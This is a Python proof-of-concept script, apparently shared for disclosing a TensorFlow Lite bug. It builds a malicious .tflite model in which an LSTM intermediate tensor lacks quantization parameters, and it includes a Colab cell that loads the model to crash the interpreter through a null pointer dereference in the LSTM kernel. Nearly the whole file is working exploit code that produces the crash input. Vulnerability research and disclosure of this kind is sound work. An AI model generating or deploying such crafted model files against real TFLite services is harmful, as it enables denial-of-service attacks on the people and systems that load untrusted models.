tensorflownullpointer / colab_poc.py
Breakingbad6's picture
Upload 4 files
befad9a verified
#!/usr/bin/env python3
"""
Self-contained PoC for Google Colab.
Copy this entire file into a single Colab cell and run.
TFLite LSTM NULL pointer dereference DoS
Bug: PopulateQuantizedLstmParams8x8_8() in lstm.cc reads
intermediate tensor quantization.params without null check.
"""
# Step 1: Install flatbuffers (Colab has tensorflow pre-installed)
import subprocess, sys
subprocess.check_call([sys.executable, "-m", "pip", "install", "-q", "flatbuffers"])
# Step 2: Build the malicious model
import flatbuffers, os, tempfile
TFLITE_SCHEMA_VERSION = 3
TENSOR_TYPE_INT8 = 9
TENSOR_TYPE_INT16 = 7
TENSOR_TYPE_INT32 = 2
BUILTIN_OP_LSTM = 16
BUILTIN_OPTIONS_LSTM = 14 # union index in BuiltinOptions
def build_poc_model():
n_batch, n_input, n_cell, n_output = 1, 2, 2, 2
b = flatbuffers.Builder(8192)
# Strings
s_main = b.CreateString("main")
names = {}
for n in ["input","i2f_w","i2c_w","i2o_w","r2f_w","r2c_w","r2o_w",
"fg_bias","cg_bias","og_bias","output_state","cell_state","output"]:
names[n] = b.CreateString(n)
for i in range(12):
names[f"inter_{i}"] = b.CreateString(f"intermediate_{i}")
def make_int_vec(vals):
b.StartVector(4, len(vals), 4)
for v in reversed(vals): b.PrependInt32(v)
return b.EndVector()
def make_float_vec(vals):
b.StartVector(4, len(vals), 4)
for v in reversed(vals): b.PrependFloat32(v)
return b.EndVector()
def make_int64_vec(vals):
b.StartVector(8, len(vals), 8)
for v in reversed(vals): b.PrependInt64(v)
return b.EndVector()
def make_bool_vec(vals):
b.StartVector(1, len(vals), 1)
for v in reversed(vals): b.PrependBool(v)
return b.EndVector()
def make_quant(scale_val, zp_val=0):
sv = make_float_vec([scale_val])
zv = make_int64_vec([zp_val])
b.StartObject(7)
b.PrependUOffsetTRelativeSlot(2, sv, 0)
b.PrependUOffsetTRelativeSlot(3, zv, 0)
return b.EndObject()
def make_tensor(name_off, shape_off, ttype, buf_idx, quant_off=0, is_var=False):
b.StartObject(10)
b.PrependUOffsetTRelativeSlot(0, shape_off, 0)
b.PrependByteSlot(1, ttype, 0)
b.PrependUint32Slot(2, buf_idx, 0)
b.PrependUOffsetTRelativeSlot(3, name_off, 0)
if quant_off: b.PrependUOffsetTRelativeSlot(4, quant_off, 0)
if is_var: b.PrependBoolSlot(5, True, False)
return b.EndObject()
# Shapes
sh_in = make_int_vec([n_batch, n_input])
sh_wi = make_int_vec([n_cell, n_input])
sh_wr = make_int_vec([n_cell, n_output])
sh_b = make_int_vec([n_cell])
sh_os = make_int_vec([n_batch, n_output])
sh_cs = make_int_vec([n_batch, n_cell])
sh_out= make_int_vec([n_batch, n_output])
sh_it = make_int_vec([1])
# Quantization
q_in = make_quant(0.1)
q_w = make_quant(0.01)
q_os = make_quant(0.1)
q_cs = make_quant(1.0/32768)
q_o = make_quant(0.1)
q_it = make_quant(0.01)
# Tensors
tensors = []
tensors.append(make_tensor(names["input"], sh_in, TENSOR_TYPE_INT8, 1, q_in))
for n in ["i2f_w","i2c_w","i2o_w"]:
tensors.append(make_tensor(names[n], sh_wi, TENSOR_TYPE_INT8, len(tensors)+1, q_w))
for n in ["r2f_w","r2c_w","r2o_w"]:
tensors.append(make_tensor(names[n], sh_wr, TENSOR_TYPE_INT8, len(tensors)+1, q_w))
for n in ["fg_bias","cg_bias","og_bias"]:
tensors.append(make_tensor(names[n], sh_b, TENSOR_TYPE_INT32, len(tensors)+1))
tensors.append(make_tensor(names["output_state"], sh_os, TENSOR_TYPE_INT8, 11, q_os, is_var=True))
tensors.append(make_tensor(names["cell_state"], sh_cs, TENSOR_TYPE_INT16, 12, q_cs, is_var=True))
tensors.append(make_tensor(names["output"], sh_out, TENSOR_TYPE_INT8, 13, q_o))
# 12 intermediates: inter_0 has NO quantization (triggers NULL deref)
for i in range(12):
if i == 0:
tensors.append(make_tensor(names[f"inter_{i}"], sh_it, TENSOR_TYPE_INT16, 14+i))
else:
tensors.append(make_tensor(names[f"inter_{i}"], sh_it, TENSOR_TYPE_INT16, 14+i, q_it))
b.StartVector(4, len(tensors), 4)
for t in reversed(tensors): b.PrependUOffsetTRelative(t)
tensors_vec = b.EndVector()
# LSTMOptions
b.StartObject(5)
b.PrependByteSlot(0, 0, 0) # activation=NONE
b.PrependFloat32Slot(1, 0.0, 0.0) # cell_clip
b.PrependFloat32Slot(2, 0.0, 0.0) # proj_clip
b.PrependByteSlot(3, 0, 0) # kernel_type=FULL
b.PrependBoolSlot(4, False, False)
lstm_opts = b.EndObject()
# Operator
op_ins = make_int_vec([0,-1,1,2,3,-1,4,5,6,-1,-1,-1,-1,7,8,9,-1,-1,10,11,-1,-1,-1,-1])
op_outs = make_int_vec([12])
op_inters = make_int_vec(list(range(13, 25)))
mut = [False]*24; mut[18]=True; mut[19]=True
op_mut = make_bool_vec(mut)
b.StartObject(14)
b.PrependUint32Slot(0, 0, 0)
b.PrependUOffsetTRelativeSlot(1, op_ins, 0)
b.PrependUOffsetTRelativeSlot(2, op_outs, 0)
b.PrependByteSlot(3, BUILTIN_OPTIONS_LSTM, 0)
b.PrependUOffsetTRelativeSlot(4, lstm_opts, 0)
b.PrependUOffsetTRelativeSlot(7, op_mut, 0)
b.PrependUOffsetTRelativeSlot(8, op_inters, 0)
operator = b.EndObject()
b.StartVector(4, 1, 4)
b.PrependUOffsetTRelative(operator)
ops_vec = b.EndVector()
# SubGraph
sg_in = make_int_vec([0])
sg_out = make_int_vec([12])
b.StartObject(5)
b.PrependUOffsetTRelativeSlot(0, tensors_vec, 0)
b.PrependUOffsetTRelativeSlot(1, sg_in, 0)
b.PrependUOffsetTRelativeSlot(2, sg_out, 0)
b.PrependUOffsetTRelativeSlot(3, ops_vec, 0)
b.PrependUOffsetTRelativeSlot(4, s_main, 0)
sg = b.EndObject()
b.StartVector(4, 1, 4)
b.PrependUOffsetTRelative(sg)
sgs_vec = b.EndVector()
# OperatorCode
b.StartObject(4)
b.PrependByteSlot(0, BUILTIN_OP_LSTM, 0)
b.PrependInt32Slot(2, 1, 1)
b.PrependInt32Slot(3, BUILTIN_OP_LSTM, 0)
oc = b.EndObject()
b.StartVector(4, 1, 4)
b.PrependUOffsetTRelative(oc)
ocs_vec = b.EndVector()
# Buffers
weight_data = bytes(n_cell * n_input) # 4 bytes
bias_data = bytes(n_cell * 4) # 8 bytes
data_vecs = {}
for bi in range(2, 8):
b.StartVector(1, len(weight_data), 1)
for byte in reversed(weight_data): b.PrependByte(byte)
data_vecs[bi] = b.EndVector()
for bi in range(8, 11):
b.StartVector(1, len(bias_data), 1)
for byte in reversed(bias_data): b.PrependByte(byte)
data_vecs[bi] = b.EndVector()
bufs = []
for bi in range(26):
if bi in data_vecs:
b.StartObject(1)
b.PrependUOffsetTRelativeSlot(0, data_vecs[bi], 0)
bufs.append(b.EndObject())
else:
b.StartObject(1)
bufs.append(b.EndObject())
b.StartVector(4, 26, 4)
for buf in reversed(bufs): b.PrependUOffsetTRelative(buf)
bufs_vec = b.EndVector()
# Model
b.StartObject(8)
b.PrependUint32Slot(0, TFLITE_SCHEMA_VERSION, 0)
b.PrependUOffsetTRelativeSlot(1, ocs_vec, 0)
b.PrependUOffsetTRelativeSlot(2, sgs_vec, 0)
b.PrependUOffsetTRelativeSlot(4, bufs_vec, 0)
model = b.EndObject()
b.Finish(model, b"TFL3")
return bytes(b.Output())
# ============================================================
# CELL 1: Build model and download it (run this first!)
# ============================================================
model_bytes = build_poc_model()
model_path = "/tmp/poc_lstm_null_deref.tflite"
with open(model_path, "wb") as f:
f.write(model_bytes)
print(f"[+] Model: {model_path} ({len(model_bytes)} bytes)")
print(f"[+] 12 intermediates, inter[0] has NO quantization -> NULL deref")
# Download the model file before crashing the kernel
try:
from google.colab import files
files.download(model_path)
print("[+] Model downloaded! Now run Cell 2 to trigger crash.")
except ImportError:
print("[*] Not on Colab, model saved to:", model_path)
# ============================================================
# CELL 2: Trigger the crash (run this AFTER downloading model)
# Put everything below this line in a SEPARATE Colab cell.
# ============================================================
# import tensorflow as tf
# print(f"[*] TensorFlow version: {tf.__version__}")
# print(f"[*] Loading model and calling allocate_tensors()...")
# print(f"[*] Expected: crash in PopulateQuantizedLstmParams8x8_8()")
# try:
# interpreter = tf.lite.Interpreter(model_path="/tmp/poc_lstm_null_deref.tflite")
# interpreter.allocate_tensors()
# print("[!] No crash - bug may be fixed or model didn't hit the right path")
# except Exception as e:
# print(f"[!] Exception (not a crash): {type(e).__name__}: {e}")
# print("[*] If the kernel died/restarted above, NULL deref triggered successfully.")